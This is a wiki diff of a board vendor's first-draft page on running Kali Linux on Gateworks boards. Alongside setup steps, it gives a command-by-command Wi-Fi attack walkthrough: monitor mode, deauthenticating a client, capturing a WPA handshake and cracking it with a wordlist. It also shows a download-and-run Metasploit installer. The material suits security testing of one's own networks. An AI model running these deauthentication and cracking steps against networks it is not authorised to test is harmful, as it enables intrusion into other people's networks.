Changes between Initial Version and Version 1 of Kali


Ignore:
Timestamp:
07/06/2021 11:30:16 PM (17 months ago)
Author:
Cale Collins
Comment:

first draft, no pics

Legend:

Unmodified
Added
Removed
Modified
  • Kali

    v1 v1  
     1= Kali
     2
     3Offical Kali Linux images are now provided by [https://www.offensive-security.com/category/kali-linux/ Offensive Security] for both Ventana and Newport. 
     4
     5Build-scripts can be found here:
     6
     7* [https://gitlab.com/kalilinux/build-scripts/kali-arm/-/blob/master/gateworks-ventana.sh Ventana]
     8* [https://gitlab.com/kalilinux/build-scripts/kali-arm/-/blob/master/gateworks-newport.sh Newport]
     9* Create your own - [https://www.kali.org/docs/development/kali-linux-arm-chroot/ kali-linux-arm-chroot]
     10
     11The Ventana prebuilt image can be downloaded from [https://www.kali.org/get-kali/ here], ARM images > Gateworks. 
     12
     13** Note:  Offical images use Gateworks kernel repos. ** 
     14
     15== What is Kali
     16
     17Kali Linux (formerly known as !BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering. Kali Linux is a multi platform solution, accessible and freely available to information security professionals and hobbyists.
     18
     19Kali Linux was released on the 13th March 2013 as a complete, top-to-bottom rebuild of !BackTrack Linux, adhering completely to Debian development standards.
     20
     21Reference: [https://www.kali.org/docs/introduction/what-is-kali-linux/]
     22
     23= Kali on Gateworks
     24
     25Official instructions:
     26
     27* [https://www.kali.org/docs/arm/gateworks-ventana/ Official Page]
     28
     29The following instructions can be used on Ventana or Newport family boards.
     30
     31Requirements:
     32* 16GB SD card or larger (Class 10 recommended)
     33* Gateworks SBC Ventana or Newport
     34* Linux Desktop Workstation
     35* Wireless radio capable of packet injection ([wiki:/wireless/wifi#Wifi-6 Alfa AWPCIE-AX200U] recommended)
     36* Antennas
     37
     38
     39== Installing Kali to an SD card
     40
     41Insert SD card into Linux workstation, then use"dmesg" to check the device name udev has assigned, for example "/dev/sdb". 
     42
     43Some operating systems will auto-mount block storage devices, the partitions must be unmounted in order to write directly to the volume:
     44{{{#!bash
     45umount /dev/sdb?
     46}}}
     47
     48Write image to SD card:
     49
     50{{{#!bash
     51xzcat kali-linux-1-newport.img.xz |sudo dd of=/dev/sdb bs=4M status=progress
     52}}}
     53
     54The card is now imaged with Kali.  Because the partitions have already been unmounted, simply remove the card. 
     55
     56
     57== Booting the SD card
     58
     59To boot from the SD card reader on the Gateworks "boot_targets", or "bootdevs" need to be set so the SD card has priority over the flash. 
     60
     61Break out in the bootloader:
     62
     63For Newport:
     64{{{
     65GW6204-B> setenv boot_targets mmc1 mmc0 usb0 scsi0
     66GW6204-B> saveenv
     67}}}
     68
     69For Ventana:
     70{{{
     71Ventana > setenv bootdevs mmc
     72Ventana > print bootdevs     
     73bootdevs=mmc
     74Ventana > saveenv
     75Saving Environment to NAND...
     76Erasing NAND...
     77Erasing at 0x1000000 -- 100% complete.
     78Writing to NAND... OK
     79Ventana >
     80}}}
     81
     82Reboot the SBC.
     83
     84Once Kali is loaded login, username "kali", password "kali".
     85
     86Verify that your network interfaces are available:
     87
     88{{{#!bash
     89ls /sys/class/net
     90}}}
     91
     92Check your radio is capable of working on the channels that will be exploited:
     93{{{#!bash
     94iw phy phy0 channels
     95}}}
     96= Install Metasploit Framework
     97
     98Metasploit framework is an open source tool which can be used to probe systematic vulnerabilities on networks and servers.
     99
     100Metasplot features:
     101* Command shell payloads that enable users to run scripts or random commands against a host
     102* Dynamic payloads that allow testers to generate unique payloads to evade antivirus software
     103* Meterpreter payloads that allow users to commandeer device monitors using VMC and to take over sessions or upload and download files
     104* Static payloads that enable port forwarding and communications between networks
     105
     106Offensive-Security offers a free online course for learning Metasploit: [https://www.offensive-security.com/metasploit-unleashed/]
     107
     108To install Metasploit on Gateworks:
     109
     1101. Update your system
     111{{{#!bash
     112apt-get update
     113}}}
     1141. Install curl
     115{{{#!bash
     116sudo apt-get install curl -y
     117}}}
     1181. Download and install Metasploit
     119{{{#!bash
     120curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
     121  chmod 755 msfinstall && \
     122  ./msfinstall
     123}}}
     124
     125= Aircrack-ng
     126
     127Aircrack-ng is a complete suite of tools to assess !WiFi network security.
     128
     129It focuses on different areas of !WiFi security:
     130* Monitoring: Packet capture and export of data to text files for further processing by third party tools
     131* Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
     132* Testing: Checking !WiFi cards and driver capabilities (capture and injection)
     133* Cracking: WEP and WPA PSK (WPA 1 and 2)
     134
     135Reference: [https://www.aircrack-ng.org/]
     136
     137For deauthentication the wifi adapter will need to be capable of packet injection. 
     138
     139To test if packet injection is available:
     140{{{#!bash
     141sudo aireplay-ng --test wlan0mon
     142}}}
     143
     144== Capturing packets
     145
     146In order to capture packets airmon-ng is used to create a monitor interface. 
     147
     148To begin connect to the board using SSH (this is important later).
     149
     150Kill processes that may interfere with airmon-ng:
     151{{{#!bash
     152sudo airmon-ng check kill
     153}}}
     154Start the monitor interface:
     155{{{#!bash
     156sudo airmon-ng start wlan0 #this command creates the "mon" interface "wlan0mon".
     157}}}
     158Kick off airodump-ng to start capturing packets. Note, airodump-ng by default will only monitor on 2.4Ghz, use the "--band a" switch to enable 5ghz monitoring. 
     159{{{#!bash
     160sudo airodump-ng --band a wlan0mon
     161}}}
     162
     163== Hacking the Gibson
     164
     165Once the target SSID has been identified record its MAC address, also note which channel it's on. 
     166
     167Single out that network to find clients which can be deauthenticated.  In this example my BSSID is {{{11:22:33:44:55:66}}} on channel 44.  We will create a log file to record the handshake called "my-handshake".
     168{{{#!bash
     169sudo airodump-ng -c44 --write my-handshake --bssid 11:22:33:44:55:66 wlan0mon
     170}}}
     171Run this scan until a client is identified.  For this example I've used my cell phone MAC {{{77:88:99:AA:BB:CC}}}.
     172
     173Start a new SSH session, so both sessions are open simultaneously. 
     174
     175In the second session execute your deauthentication attack (this is where packet injection is used):
     176{{{#!bash
     177sudo aireplay-ng --deauth 0 -a 11:22:33:44:55:66 -c 77:88:99:AA:BB:CC wlan0mon
     178}}}
     179Upon sucess the client is disconnected from the access point.  When the client reconnects airodump-ng will capture the handshake and log it to the designated file. 
     180
     181=== Wordlists and Aircrack-ng
     182
     183Wordlists with default manufacturer passwords are provided by Metasploit framework.  More wordlists can be found in "/usr/share/wordlists".  A wordlist is only one potential approach to breaking the handshake hash.  Because it is the most simple we will use this method in the following example. 
     184
     185An all around basic wordlist included with Kali is rockyou.txt.
     186{{{#!bash
     187sudo gunzip /usr/share/wordlists/rockyou.txt.gz #extract the wordlist
     188cat /usr/share/wordlists/rockyou.txt #display words contained in the list
     189}}}
     190Kick off aircrack-ng to decrypt the hash:
     191{{{
     192aircrack-ng my-handshake-01.cap -w /usr/share/wordlists/rockyou.txt
     193}}}
     194
     195= Getting help with Kali
     196
     197Please direct all Kali Linux related questions to the forums:
     198
     199https://forums.kali.org/
     200
     201Feel welcome to contact !support@gateworks.com for questions specific to Gateworks.
     202
     203 
     204